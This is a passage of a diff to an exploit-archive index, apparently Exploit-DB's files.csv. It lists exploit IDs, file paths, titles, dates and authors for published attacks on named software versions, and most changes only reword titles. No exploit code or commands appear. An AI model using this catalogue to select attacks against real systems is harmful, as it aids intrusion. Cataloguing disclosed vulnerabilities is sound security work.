4.2.0 - Multiple Vulnerabilities",2010-11-30,"High-Tech Bridge SA",php,webapps,0 15647,platforms/php/webapps/15647.txt,"Elxis CMS 2009.2 - SQL Injection",2010-11-30,"High-Tech Bridge SA",php,webapps,0 15648,platforms/windows/remote/15648.html,"J-Integra 2.11 - Remote Code Execution",2010-12-01,bz1p,windows,remote,0 -15649,platforms/windows/dos/15649.pl,"HP Data Protector Manager A.06.11 MMD - NULL Pointer Dereference Denial of Service",2010-12-01,Pepelux,windows,dos,0 +15649,platforms/windows/dos/15649.pl,"HP Data Protector Manager A.06.11 MMD - Null Pointer Dereference Denial of Service",2010-12-01,Pepelux,windows,dos,0 15650,platforms/php/webapps/15650.txt,"Alibaba Clone B2B 3.4 - SQL Injection",2010-12-01,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 15651,platforms/php/webapps/15651.txt,"OsCSS 1.2 - Arbitrary File Upload",2010-12-01,"Shichemt Alen",php,webapps,0 15653,platforms/asp/webapps/15653.txt,"bugtracker.net 3.4.4 - Multiple Vulnerabilities",2010-12-01,"Core Security",asp,webapps,0 @@ -13621,7 +13622,7 @@ id,file,description,date,author,platform,type,port 15682,platforms/asp/webapps/15682.txt,"ASPSiteWare ASP Gallery 1.0 - SQL Injection",2010-12-04,R4dc0re,asp,webapps,0 15683,platforms/asp/webapps/15683.txt,"ASPSiteWare Contact Directory 1.0 - SQL Injection",2010-12-04,R4dc0re,asp,webapps,0 15684,platforms/php/webapps/15684.txt,"WordPress do_trackbacks() function - SQL Injection",2010-12-05,M4g,php,webapps,0 -15685,platforms/php/webapps/15685.html,"PHPKF Forum 1.80 - profil_degistir.php Cross-Site Request Forgery Exploit",2010-12-05,FreWaL,php,webapps,0 +15685,platforms/php/webapps/15685.html,"PHPKF Forum 1.80 - profil_degistir.php Cross-Site Request Forgery",2010-12-05,FreWaL,php,webapps,0 15686,platforms/asp/webapps/15686.txt,"Gatesoft Docusafe 4.1.0 - SQL Injection",2010-12-05,R4dc0re,asp,webapps,0 15687,platforms/asp/webapps/15687.txt,"Ecommercemax Solutions Digital Goods Seller - SQL Injection",2010-12-05,R4dc0re,asp,webapps,0 15688,platforms/asp/webapps/15688.txt,"HotWebScripts HotWeb Rentals - 'resorts.asp' SQL Injection",2010-12-05,R4dc0re,asp,webapps,0 @@ -13652,7 +13653,7 @@ id,file,description,date,author,platform,type,port 15717,platforms/multiple/remote/15717.txt,"VMware Tools - Update OS Command Injection",2010-12-09,"Nahuel Grisolia",multiple,remote,0 15714,platforms/php/webapps/15714.txt,"Joomla JE Auto Component 1.0 - SQL Injection",2010-12-09,"Salvatore Fresta",php,webapps,0 15715,platforms/php/webapps/15715.txt,"CMScout 2.09 - Cross-Site Request Forgery",2010-12-09,"High-Tech Bridge SA",php,webapps,0 -15720,platforms/php/webapps/15720.txt,"Sulata iSoft - 'stream.php' Local File Disclosure Exploit",2010-12-10,Sudden_death,php,webapps,0 +15720,platforms/php/webapps/15720.txt,"Sulata iSoft - 'stream.php' Local File Disclosure",2010-12-10,Sudden_death,php,webapps,0 15718,platforms/php/webapps/15718.txt,"AJ Matrix DNA - SQL Injection",2010-12-09,Br0ly,php,webapps,0 15719,platforms/php/webapps/15719.txt,"JE Messenger 1.0 - Arbitrary File Upload",2010-12-09,"Salvatore Fresta",php,webapps,0 15721,platforms/php/webapps/15721.txt,"Joomla Component Billy Portfolio 1.1.2 - Blind SQL Injection",2010-12-10,jdc,php,webapps,0 @@ -13691,7 +13692,7 @@ id,file,description,date,author,platform,type,port 15762,platforms/windows/local/15762.txt,"NProtect Anti-Virus 2007 <= 2010.5.11.1 - Privilege Escalation",2010-12-17,MJ0011,windows,local,0 15763,platforms/windows/local/15763.txt,"ESTsoft ALYac Anti-Virus 1.5 <= 5.0.1.2 - Privilege Escalation",2010-12-17,MJ0011,windows,local,0 15764,platforms/windows/local/15764.txt,"ViRobot Desktop 5.5 and Server 3.5 <= 2008.8.1.1 - Privilege Escalation",2010-12-17,MJ0011,windows,local,0 -15765,platforms/php/webapps/15765.txt,"CubeCart 3.x - Remote File Upload",2010-12-17,StunTMaN!,php,webapps,0 +15765,platforms/php/webapps/15765.txt,"CubeCart 3.x - Arbitrary File Upload",2010-12-17,StunTMaN!,php,webapps,0 15767,platforms/windows/dos/15767.py,"Ecava IntegraXor Remote - ActiveX Buffer Overflow (PoC)",2010-12-18,"Jeremy Brown",windows,dos,0 15768,platforms/php/webapps/15768.txt,"MCFileManager Plugin for TinyMCE 3.2.2.3 - Arbitrary File Upload",2010-12-18,"Vladimir Vorontsov",php,webapps,0 15769,platforms/php/webapps/15769.txt,"Ero Auktion 2010 - 'item.php' SQL Injection",2010-12-18,"DeadLy DeMon",php,webapps,0 @@ -13731,7 +13732,7 @@ id,file,description,date,author,platform,type,port 15806,platforms/linux/remote/15806.txt,"Citrix Access Gateway - Command Injection",2010-12-22,"George D. Gal",linux,remote,0 15807,platforms/cgi/webapps/15807.txt,"Mitel AWC - Unauthenticated Command Execution",2010-12-22,Procheckup,cgi,webapps,0 15808,platforms/php/webapps/15808.txt,"WordPress Plugin Accept Signups 0.1 - Cross-Site Scripting",2010-12-22,clshack,php,webapps,0 -15809,platforms/windows/remote/15809.html,"WMITools ActiveX - Remote Command Execution Exploit",2010-12-22,WooYun,windows,remote,0 +15809,platforms/windows/remote/15809.html,"WMITools ActiveX - Remote Command Execution",2010-12-22,WooYun,windows,remote,0 15810,platforms/hardware/webapps/15810.txt,"D-Link WBR-1310 - Authentication Bypass",2010-12-23,"Craig Heffner",hardware,webapps,0 15811,platforms/php/webapps/15811.txt,"Built2Go PHP Shopping - SQL Injection",2010-12-23,Br0ly,php,webapps,0 15812,platforms/php/webapps/15812.txt,"Ypninc Realty Classifieds - SQL Injection",2010-12-23,Br0ly,php,webapps,0 @@ -13800,8 +13801,8 @@ id,file,description,date,author,platform,type,port 15896,platforms/php/webapps/15896.txt,"Sahana Agasti 0.6.4 - Multiple Remote File Inclusion",2011-01-03,n0n0x,php,webapps,0 15897,platforms/windows/dos/15897.py,"Music Animation Machine MIDI Player - Local Crash (PoC)",2011-01-03,c0d3R'Z,windows,dos,0 15898,platforms/multiple/dos/15898.py,"Wireshark - ENTTEC DMX Data RLE Buffer Overflow",2011-01-03,"non-customers crew",multiple,dos,0 -15902,platforms/php/webapps/15902.html,"S40 CMS 0.4.1 - Change Admin Password Cross-Site Request Forgery Exploit",2011-01-04,pentesters.ir,php,webapps,0 -15901,platforms/windows/local/15901.py,"Music Animation Machine MIDI Player - SEH Buffer Overflow",2011-01-04,Acidgen,windows,local,0 +15902,platforms/php/webapps/15902.html,"S40 CMS 0.4.1 - (Change Admin Password) Cross-Site Request Forgery",2011-01-04,pentesters.ir,php,webapps,0 +15901,platforms/windows/local/15901.py,"Music Animation Machine MIDI Player - Buffer Overflow (SEH)",2011-01-04,Acidgen,windows,local,0 15905,platforms/windows/dos/15905.py,"Xynph 1.0 - USER Denial of Service",2011-01-04,freak_out,windows,dos,0 15991,platforms/windows/remote/15991.html,"Real Networks RealPlayer SP - 'RecordClip' Method Remote Code Execution",2011-01-14,"Sean de Regge",windows,remote,0 15907,platforms/php/webapps/15907.txt,"Nucleus 3.61 - Multiple Remote File Inclusion",2011-01-05,n0n0x,php,webapps,0 @@ -13819,7 +13820,7 @@ id,file,description,date,author,platform,type,port 15957,platforms/windows/remote/15957.py,"KingView 6.5.3 - SCADA HMI Heap Overflow (PoC)",2011-01-09,"Dillon Beresford",windows,remote,0 15934,platforms/windows/local/15934.py,"BS.Player 2.57 - Buffer Overflow (Unicode SEH)",2011-01-07,"C4SS!0 G0M3S",windows,local,0 15935,platforms/linux/dos/15935.c,"GNU libc/regcomp(3) - Multiple Vulnerabilities",2011-01-07,"Maksymilian Arciemowicz",linux,dos,0 -15936,platforms/windows/local/15936.py,"VideoSpirit Pro 1.68 - Local Buffer Overflow Exploit",2011-01-08,xsploitedsec,windows,local,0 +15936,platforms/windows/local/15936.py,"VideoSpirit Pro 1.68 - Local Buffer Overflow",2011-01-08,xsploitedsec,windows,local,0 15937,platforms/multiple/remote/15937.pl,"NetSupport Manager Agent - Remote Buffer Overflow (1)",2011-01-08,ikki,multiple,remote,0 15938,platforms/php/webapps/15938.txt,"axdcms-0.1.1 - Local File Inclusion",2011-01-08,n0n0x,php,webapps,0 15939,platforms/php/webapps/15939.txt,"Elxis CMS 2009.2 - Remote File Inclusion",2011-01-08,n0n0x,php,webapps,0 @@ -13874,7 +13875,7 @@ id,file,description,date,author,platform,type,port 16009,platforms/windows/local/16009.pl,"A-PDF All to MP3 Converter 2.0.0 - '.wav' Buffer Overflow",2011-01-18,h1ch4m,windows,local,0 16010,platforms/php/webapps/16010.txt,"allCineVid Joomla Component 1.0.0 - Blind SQL Injection",2011-01-18,"Salvatore Fresta",php,webapps,0 16011,platforms/php/webapps/16011.txt,"CakePHP 1.3.5 / 1.2.8 - Unserialize()",2011-01-18,felix,php,webapps,0 -16013,platforms/php/webapps/16013.html,"N-13 News 3.4 - Remote Admin Add Cross-Site Request Forgery Exploit",2011-01-18,anT!-Tr0J4n,php,webapps,0 +16013,platforms/php/webapps/16013.html,"N-13 News 3.4 - Remote Admin Add Cross-Site Request Forgery",2011-01-18,anT!-Tr0J4n,php,webapps,0 16014,platforms/windows/remote/16014.html,"Novell iPrint 5.52 - ActiveX GetDriverSettings() Remote Exploit (ZDI-10-256)",2011-01-19,Dr_IDE,windows,remote,0 17209,platforms/php/webapps/17209.txt,"SoftMP3 - SQL Injection",2011-04-24,mArTi,php,webapps,0 17210,platforms/windows/local/17210.rb,"eZip Wizard 3.0 - Stack Buffer Overflow",2011-04-25,Metasploit,windows,local,0 @@ -13903,20 +13904,20 @@ id,file,description,date,author,platform,type,port 16047,platforms/php/webapps/16047.txt,"PHPDirector Game Edition - 'game.php' SQL Injection",2011-01-26,"AtT4CKxT3rR0r1ST ",php,webapps,0 16110,platforms/php/webapps/16110.txt,"reos 2.0.5 - Multiple Vulnerabilities",2011-02-04,"High-Tech Bridge SA",php,webapps,0 16049,platforms/php/webapps/16049.txt,"AWCM 2.2 Final - Local File Inclusion",2011-01-26,Cucura,php,webapps,0 -16050,platforms/php/webapps/16050.txt,"class.upload.php 0.30 - Remote File Upload",2011-01-26,DIES3L,php,webapps,0 +16050,platforms/php/webapps/16050.txt,"class.upload.php 0.30 - Arbitrary File Upload",2011-01-26,DIES3L,php,webapps,0 16051,platforms/php/webapps/16051.txt,"Froxlor 0.9.15 - Remote File Inclusion",2011-01-26,DIES3L,php,webapps,0 16052,platforms/windows/remote/16052.txt,"Oracle Document Capture 10.1.3.5 - Insecure Method / Buffer Overflow",2011-01-26,"Alexandr Polyakov",windows,remote,0 16053,platforms/windows/remote/16053.txt,"Oracle Document Capture - Actbar2.ocx Insecure Method",2011-01-26,"Evdokimov Dmitriy",windows,remote,0 16054,platforms/windows/webapps/16054.txt,"sap crystal report server 2008 - Directory Traversal",2011-01-26,"Dmitriy Chastuhin",windows,webapps,0 16055,platforms/windows/remote/16055.txt,"Oracle Document Capture - empop3.dll Insecure Methods",2011-01-26,"Evdokimov Dmitriy",windows,remote,0 16056,platforms/windows/remote/16056.txt,"Oracle - Document Capture Insecure READ Method",2011-01-26,"Alexey Sintsov",windows,remote,0 -16058,platforms/php/webapps/16058.txt,"MultiPowUpload 2.1 - Remote File Upload",2011-01-26,DIES3L,php,webapps,0 +16058,platforms/php/webapps/16058.txt,"MultiPowUpload 2.1 - Arbitrary File Upload",2011-01-26,DIES3L,php,webapps,0 16059,platforms/php/webapps/16059.txt,"Xnova Legacies 2009.2 - Cross-Site Request Forgery",2011-01-26,"Xploit A Day",php,webapps,0 16061,platforms/php/webapps/16061.txt,"PHP Link Directory Software - (sbcat_id) SQL Injection",2011-01-28,"BorN To K!LL",php,webapps,0 16062,platforms/php/webapps/16062.txt,"PHP Classified ads software - 'cid' Blind SQL Injection",2011-01-28,"BorN To K!LL",php,webapps,0 -16064,platforms/bsd/dos/16064.c,"FreeBSD 8.0 - Local Denial of Service (forced reboot)",2011-01-28,kingcope,bsd,dos,0 +16064,platforms/bsd/dos/16064.c,"FreeBSD 8.0 - Local Denial of Service (Forced Reboot)",2011-01-28,kingcope,bsd,dos,0 16069,platforms/php/webapps/16069.txt,"PHP Script Directory Software - (sbcat_id) SQL Injection",2011-01-28,"BorN To K!LL",php,webapps,0 -16070,platforms/windows/local/16070.py,"Virtuosa Phoenix Edition 5.2 - ASX SEH Buffer Overflow",2011-01-28,Acidgen,windows,local,0 +16070,platforms/windows/local/16070.py,"Virtuosa Phoenix Edition 5.2 - ASX Buffer Overflow (SEH)",2011-01-28,Acidgen,windows,local,0 16071,platforms/windows/local/16071.txt,"Microsoft Internet Explorer - MHTML Protocol Handler Cross-Site Scripting",2011-01-29,80vul,windows,local,0 16068,platforms/hardware/dos/16068.pl,"Polycom SoundPoint IP Devices - Denial of Service",2011-01-28,"pawel gawinek",hardware,dos,0 16072,platforms/windows/local/16072.py,"WM Downloader 3.1.2.2 2010.04.15 - '.m3u' Buffer Overflow (DEP Bypass)",2011-01-29,sickness,windows,local,0 @@ -13965,7 +13966,7 @@ id,file,description,date,author,platform,type,port 16128,platforms/php/webapps/16128.txt,"jakcms 2.0 pro rc5 - Persistent Cross-Site Scripting via useragent http header Injection",2011-02-07,"Saif El-Sherei",php,webapps,0 16129,platforms/linux/dos/16129.txt,"ProFTPd mod_sftp - Integer Overflow Denial of Service (PoC)",2011-02-07,kingcope,linux,dos,0 16130,platforms/php/webapps/16130.txt,"MyMarket 1.71 - 'index.php' SQL Injection",2011-02-07,ahmadso,php,webapps,0 -16131,platforms/php/webapps/16131.txt,"SWFupload 2.5.0 Beta 3 - File Arbitrary Upload",2011-02-07,"Daniel Godoy",php,webapps,0 +16131,platforms/php/webapps/16131.txt,"SWFupload 2.5.0 Beta 3 - Arbitrary File Upload",2011-02-07,"Daniel Godoy",php,webapps,0 16132,platforms/windows/local/16132.htm,"AoA DVD Creator 2.5 - ActiveX Stack Overflow",2011-02-07,"Carlos Mario Penagos Hollmann",windows,local,0 16133,platforms/windows/local/16133.htm,"AoA Mp4 Converter 4.1.0 - ActiveX Stack Overflow",2011-02-07,"Carlos Mario Penagos Hollmann",windows,local,0 16134,platforms/php/webapps/16134.txt,"Model Agentur Script - SQL Injection",2011-02-08,NoNameMT,php,webapps,0 @@ -13987,7 +13988,7 @@ id,file,description,date,author,platform,type,port 16148,platforms/php/webapps/16148.txt,"SourceBans 1.4.7 - Cross-Site Scripting",2011-02-09,Sw1tCh,php,webapps,0 16149,platforms/hardware/remote/16149.txt,"Linksys WAP610N - Unauthenticated Root Access Security",2011-02-10,"Matteo Ignaccolo",hardware,remote,0 16150,platforms/windows/dos/16150.py,"XM Easy Personal FTP Server 5.8.0 - (TYPE) Denial of Service",2011-02-10,"Houssam Sahli",windows,dos,0 -16152,platforms/multiple/webapps/16152.py,"LocatePC 1.05 (Ligatt Version + Others) - Trivial SQL Injection",2011-02-10,anonymous,multiple,webapps,0 +16152,platforms/multiple/webapps/16152.py,"LocatePC 1.05 (Ligatt Version + Others) - SQL Injection",2011-02-10,anonymous,multiple,webapps,0 16153,platforms/windows/local/16153.py,"MoviePlay 4.82 - '.lst' Buffer Overflow",2011-02-11,sickness,windows,local,0 16154,platforms/php/webapps/16154.txt,"Horde - Horde_Image::factory driver Argument Local File Inclusion",2011-02-11,skysbsb,php,webapps,0 16155,platforms/php/webapps/16155.txt,"Geomi CMS 1.2 & 3.0 - SQL Injection",2011-02-11,"ThunDEr HeaD",php,webapps,0 @@ -14008,8 +14009,8 @@ id,file,description,date,author,platform,type,port 16178,platforms/asp/webapps/16178.txt,"Rae Media Real Estate Single Agent - SQL Injection",2011-02-16,R4dc0re,asp,webapps,0 16179,platforms/asp/webapps/16179.txt,"Rae Media Real Estate Multi Agent - SQL Injection",2011-02-16,R4dc0re,asp,webapps,0 16180,platforms/windows/dos/16180.py,"BWMeter 5.4.0 - '.csv' Denial of Service",2011-02-17,b0telh0,windows,dos,0 -16181,platforms/php/webapps/16181.txt,"WordPress User Photo Component Plugin - Remote File Upload",2011-02-17,ADVtools,php,webapps,0 -16182,platforms/linux/dos/16182.txt,"PHP 5.3.5 - grapheme_extract() NULL Pointer Dereference",2011-02-17,"Maksymilian Arciemowicz",linux,dos,0 +16181,platforms/php/webapps/16181.txt,"WordPress User Photo Component Plugin - Arbitrary File Upload",2011-02-17,ADVtools,php,webapps,0 +16182,platforms/linux/dos/16182.txt,"PHP 5.3.5 - grapheme_extract() Null Pointer Dereference",2011-02-17,"Maksymilian Arciemowicz",linux,dos,0 16193,platforms/windows/dos/16193.pl,"Avira AntiVir QUA file - (avcenter.exe) Local Crash (PoC)",2011-02-19,KedAns-Dz,windows,dos,0 16204,platforms/windows/dos/16204.pl,"Solar FTP 2.1 - Denial of Service",2011-02-22,x000,windows,dos,0 16190,platforms/windows/dos/16190.pl,"IBM Lotus Domino LDAP - Bind Request Remote Code Execution",2011-02-18,"Francis Provencher",windows,dos,0 @@ -14035,7 +14036,7 @@ id,file,description,date,author,platform,type,port 16209,platforms/ios/remote/16209.txt,"iOS SideBooks 1.0 - Directory Traversal",2011-02-22,"R3d@l3rt, Sp@2K, Sunlight",ios,remote,0 16222,platforms/php/webapps/16222.txt,"course registration management system 2.1 - Multiple Vulnerabilities",2011-02-23,"AutoSec Tools",php,webapps,0 16223,platforms/php/webapps/16223.txt,"VidiScript - SQL Injection",2011-02-23,ThEtA.Nu,php,webapps,0 -16220,platforms/php/webapps/16220.py,"ProQuiz 2.0.0b - Arbitrary Upload",2011-02-23,"AutoSec Tools",php,webapps,0 +16220,platforms/php/webapps/16220.py,"ProQuiz 2.0.0b - Arbitrary File Upload",2011-02-23,"AutoSec Tools",php,webapps,0 16218,platforms/php/webapps/16218.txt,"Z-Vote 1.1 WordPress Plugin - SQL Injection",2011-02-23,"High-Tech Bridge SA",php,webapps,0 16213,platforms/php/webapps/16213.txt,"Hyena Cart - 'index.php' SQL Injection",2011-02-23,"AtT4CKxT3rR0r1ST ",php,webapps,0 16214,platforms/php/webapps/16214.txt,"tplSoccerStats - 'player.php' SQL Injection",2011-02-23,"AtT4CKxT3rR0r1ST ",php,webapps,0 @@ -14061,7 +14062,7 @@ id,file,description,date,author,platform,type,port 16245,platforms/hardware/remote/16245.py,"iphone mydocs 2.7 - Directory Traversal",2011-02-25,"Khashayar Fereidani",hardware,remote,0 16246,platforms/php/webapps/16246.py,"Joomla XCloner Component (com_xcloner-backupandrestore) - Remote Command Execution",2011-02-25,mr_me,php,webapps,0 16247,platforms/php/webapps/16247.txt,"Pragyan CMS 3.0 - Multiple Vulnerabilities",2011-02-25,"Villy and Abhishek Lyall",php,webapps,0 -16248,platforms/windows/dos/16248.pl,"eXPert PDF Reader 4.0 - NULL Pointer Dereference and Heap Corruption",2011-02-26,LiquidWorm,windows,dos,0 +16248,platforms/windows/dos/16248.pl,"eXPert PDF Reader 4.0 - Null Pointer Dereference and Heap Corruption",2011-02-26,LiquidWorm,windows,dos,0 16249,platforms/php/webapps/16249.txt,"phreebooks r30rc4 - Multiple Vulnerabilities",2011-02-26,"AutoSec Tools",php,webapps,0 16250,platforms/php/webapps/16250.txt,"jQuery Mega Menu 1.0 WordPress Plugin - Local File Inclusion",2011-02-26,"AutoSec Tools",php,webapps,0 16251,platforms/php/webapps/16251.txt,"OPS Old Post Spinner 2.2.1 WordPress Plugin - Local File Inclusion",2011-02-26,"AutoSec Tools",php,webapps,0 @@ -14082,7 +14083,7 @@ id,file,description,date,author,platform,type,port 16271,platforms/ios/remote/16271.txt,"iOS TIOD 1.3.3 - Directory Traversal",2011-03-03,"R3d@l3rt, H@ckk3y",ios,remote,0 16273,platforms/php/webapps/16273.php,"PHP Speedy 0.5.2 WordPress Plugin - (admin_container.php) Remote Code Execution",2011-03-04,mr_me,php,webapps,0 16274,platforms/jsp/webapps/16274.pl,"JBoss Application Server 4.2 < 4.2.0.CP09 / 4.3 < 4.3.0.CP08 - Remote Exploit",2011-03-04,kingcope,jsp,webapps,0 -16275,platforms/hardware/remote/16275.txt,"Comtrend ADSL Router CT-5367 C01_R12 - Remote Root",2011-03-04,"Todor Donev",hardware,remote,0 +16275,platforms/hardware/remote/16275.txt,"Comtrend ADSL Router CT-5367 C01_R12 - Remote Root Exploit",2011-03-04,"Todor Donev",hardware,remote,0 16276,platforms/php/webapps/16276.txt,"ADAN Neuronlabs - 'view.php' SQL Injection",2011-03-04,IRAQ_JAGUAR,php,webapps,0 16278,platforms/ios/remote/16278.py,"iOS iFileExplorer Free - Directory Traversal",2011-03-04,theSmallNothin,ios,remote,0 16279,platforms/php/webapps/16279.txt,"MySms 1.0 - Multiple Vulnerabilities",2011-03-05,"AtT4CKxT3rR0r1ST ",php,webapps,0 @@ -14100,7 +14101,7 @@ id,file,description,date,author,platform,type,port 16293,platforms/multiple/remote/16293.rb,"Sun Java - Calendar Deserialization Exploit",2010-09-20,Metasploit,multiple,remote,0 16294,platforms/multiple/remote/16294.rb,"Sun Java JRE - getSoundbank file:// URI Buffer Overflow",2010-09-20,Metasploit,multiple,remote,0 16295,platforms/multiple/remote/16295.rb,"Apple QTJava - toQTPointer() Arbitrary Memory Access",2010-09-20,Metasploit,multiple,remote,0 -16296,platforms/osx/remote/16296.rb,"Apple Mac OS X iTunes 8.1.1 - ITms Overflow",2010-11-11,Metasploit,osx,remote,0 +16296,platforms/osx/remote/16296.rb,"Apple Mac OSX iTunes 8.1.1 - ITms Overflow",2010-11-11,Metasploit,osx,remote,0 16297,platforms/multiple/remote/16297.rb,"Java - Statement.invoke() Trusted Method Chain Exploit",2010-12-15,Metasploit,multiple,remote,0 16298,platforms/multiple/remote/16298.rb,"Sun Java - JRE AWT setDiffICM Buffer Overflow",2010-09-20,Metasploit,multiple,remote,0 16299,platforms/multiple/remote/16299.rb,"Firefox 3.5 - escape() Return Value Memory Corruption",2010-09-20,Metasploit,multiple,remote,0 @@ -14124,7 +14125,7 @@ id,file,description,date,author,platform,type,port 16317,platforms/multiple/remote/16317.rb,"Apache Tomcat Manager Application Deployer - Authenticated Code Execution",2010-12-14,Metasploit,multiple,remote,0 16318,platforms/multiple/remote/16318.rb,"JBoss JMX - Console Deployer Upload and Execute",2010-10-19,Metasploit,multiple,remote,0 16319,platforms/multiple/remote/16319.rb,"JBoss JMX - Console Beanshell Deployer WAR Upload and Deployment",2011-01-10,Metasploit,multiple,remote,0 -16320,platforms/unix/remote/16320.rb,"Samba - 'username map script' Command Execution",2010-08-18,Metasploit,unix,remote,0 +16320,platforms/unix/remote/16320.rb,"Samba - ''Username' map script' Command Execution",2010-08-18,Metasploit,unix,remote,0 16321,platforms/linux/remote/16321.rb,"Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow",2010-04-28,Metasploit,linux,remote,0 16322,platforms/solaris/remote/16322.rb,"Solaris LPD - Command Execution",2010-09-20,Metasploit,solaris,remote,0 16323,platforms/solaris_sparc/remote/16323.rb,"Solaris dtspcd - Heap Overflow",2010-04-30,Metasploit,solaris_sparc,remote,0 @@ -14133,7 +14134,7 @@ id,file,description,date,author,platform,type,port 16326,platforms/solaris/remote/16326.rb,"Solaris - ypupdated Command Execution",2010-07-25,Metasploit,solaris,remote,0 16327,platforms/solaris/remote/16327.rb,"Solaris in.TelnetD - TTYPROMPT Buffer Overflow",2010-06-22,Metasploit,solaris,remote,0 16328,platforms/solaris/remote/16328.rb,"Sun Solaris - Telnet Remote Authentication Bypass",2010-06-22,Metasploit,solaris,remote,0 -16329,platforms/solaris/remote/16329.rb,"Samba (Solaris) - lsa_io_trans_names Heap Overflow",2010-04-05,Metasploit,solaris,remote,0 +16329,platforms/solaris/remote/16329.rb,"Samba (Solaris) - lsa_io_trans_names Heap Overflow",2010-04-05,Metasploit,solaris,remote,0 16330,platforms/solaris_sparc/remote/16330.rb,"Samba (Solaris SPARC) - trans2open Overflow",2010-06-21,Metasploit,solaris_sparc,remote,0 16331,platforms/windows/remote/16331.rb,"Veritas Backup Exec Name Service - Overflow Exploit",2010-06-22,Metasploit,windows,remote,0 16332,platforms/windows/remote/16332.rb,"Veritas Backup Exec Windows - Remote Agent Overflow",2010-07-03,Metasploit,windows,remote,0 @@ -14143,7 +14144,7 @@ id,file,description,date,author,platform,type,port 16336,platforms/windows/remote/16336.rb,"NIPrint LPD - Request Overflow",2010-12-25,Metasploit,windows,remote,0 16337,platforms/windows/remote/16337.rb,"Hummingbird Connectivity 10 SP5 - LPD Buffer Overflow",2010-09-20,Metasploit,windows,remote,0 16338,platforms/windows/remote/16338.rb,"SAP SAPLPD 6.28 - Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 -16339,platforms/windows/remote/16339.rb,"Timbuktu Pro - Directory Traversal / File Upload",2010-11-24,Metasploit,windows,remote,0 +16339,platforms/windows/remote/16339.rb,"Timbuktu Pro - Directory Traversal / Arbitrary File Upload",2010-11-24,Metasploit,windows,remote,0 16340,platforms/windows/remote/16340.rb,"Oracle 8i TNS Listener - 'ARGUMENTS' Buffer Overflow",2010-11-24,Metasploit,windows,remote,0 16341,platforms/windows/remote/16341.rb,"Oracle 8i - TNS Listener SERVICE_NAME Buffer Overflow",2010-11-24,Metasploit,windows,remote,0 16342,platforms/windows/remote/16342.rb,"Oracle 10gR2 - TNS Listener AUTH_SESSKEY Buffer Overflow",2010-11-24,Metasploit,windows,remote,0 @@ -14270,7 +14271,7 @@ id,file,description,date,author,platform,type,port 16463,platforms/windows/remote/16463.rb,"PuTTy.exe 0.53 - Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 16464,platforms/windows/remote/16464.rb,"ISS - PAM.dll ICQ Parser Buffer Overflow",2010-09-20,Metasploit,windows,remote,0 16465,platforms/windows/remote/16465.rb,"Kerio Firewall 2.1.4 - Authentication Packet Overflow",2010-06-15,Metasploit,windows,remote,0 -16466,platforms/win_x86/remote/16466.rb,"Arkeia Backup Client Type 77 (Windows/x86) - Overflow",2010-05-09,Metasploit,win_x86,remote,0 +16466,platforms/win_x86/remote/16466.rb,"Arkeia Backup Client Type 77 (Windows/x86) - Overflow Exploit",2010-05-09,Metasploit,win_x86,remote,0 16467,platforms/windows/remote/16467.rb,"Microsoft IIS/PWS - CGI Filename Double Decode Command Execution",2011-01-08,Metasploit,windows,remote,0 16468,platforms/windows/remote/16468.rb,"Microsoft IIS 4.0 - '.htr' Path Overflow",2010-04-30,Metasploit,windows,remote,0 16469,platforms/windows/remote/16469.rb,"Microsoft IIS 5.0 - Printer Host Header Overflow",2010-04-30,Metasploit,windows,remote,0 @@ -14324,7 +14325,7 @@ id,file,description,date,author,platform,type,port 16517,platforms/windows/remote/16517.rb,"IBM Access Support - ActiveX Control Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 16518,platforms/windows/remote/16518.rb,"Chilkat Crypt - ActiveX WriteFile Unsafe Method",2010-09-20,Metasploit,windows,remote,0 16519,platforms/windows/remote/16519.rb,"Yahoo! Messenger 8.1.0.249 - ActiveX Control Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 -16520,platforms/windows/remote/16520.rb,"VeryPDF PDFView - OCX ActiveX OpenPDF Heap Overflow Exploit",2010-09-20,Metasploit,windows,remote,0 +16520,platforms/windows/remote/16520.rb,"VeryPDF PDFView - OCX ActiveX OpenPDF Heap Overflow",2010-09-20,Metasploit,windows,remote,0 16521,platforms/windows/remote/16521.rb,"Microsoft Windows Media Encoder 9 - wmex.dll ActiveX Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16522,platforms/windows/remote/16522.rb,"Yahoo! Messenger - YVerInfo.dll ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16523,platforms/windows/remote/16523.rb,"Novell iPrint Client - ActiveX Control target-frame Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 @@ -14348,7 +14349,7 @@ id,file,description,date,author,platform,type,port 16541,platforms/windows/remote/16541.rb,"Microsoft Internet Explorer - Winhlp32.exe MsgBox Code Execution",2010-09-28,Metasploit,windows,remote,0 16542,platforms/windows/remote/16542.rb,"Microsoft OWC Spreadsheet - HTMLURL Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 16543,platforms/windows/remote/16543.rb,"Novell iPrint Client - ActiveX Control Date/Time Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 -16544,platforms/windows/remote/16544.rb,"SonicWALL Aventail - epi.dll AuthCredential Format String Exploit",2010-09-20,Metasploit,windows,remote,0 +16544,platforms/windows/remote/16544.rb,"SonicWALL Aventail - epi.dll AuthCredential Format String",2010-09-20,Metasploit,windows,remote,0 16545,platforms/windows/remote/16545.rb,"Microsoft Help Center - Cross-Site Scripting / Command Execution",2010-09-20,Metasploit,windows,remote,0 16546,platforms/windows/local/16546.rb,"Adobe - FlateDecode Stream Predictor 02 Integer Overflow (1)",2010-09-20,Metasploit,windows,local,0 16547,platforms/windows/remote/16547.rb,"Microsoft Internet Explorer - Style getElementsByTagName Memory Corruption",2010-07-12,Metasploit,windows,remote,0 @@ -14397,7 +14398,7 @@ id,file,description,date,author,platform,type,port 16590,platforms/windows/remote/16590.rb,"Microsoft Internet Explorer - DHTML Behaviour Use-After-Free",2010-12-14,Metasploit,windows,remote,0 16591,platforms/windows/remote/16591.rb,"AOL Radio AmpX - ActiveX Control ConvertFile() Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 16592,platforms/windows/remote/16592.rb,"SoftArtisans XFile FileManager - ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 -16593,platforms/windows/local/16593.rb,"Adobe - JBIG2Decode Memory Corruption Exploit (1)",2010-06-15,Metasploit,windows,local,0 +16593,platforms/windows/local/16593.rb,"Adobe - 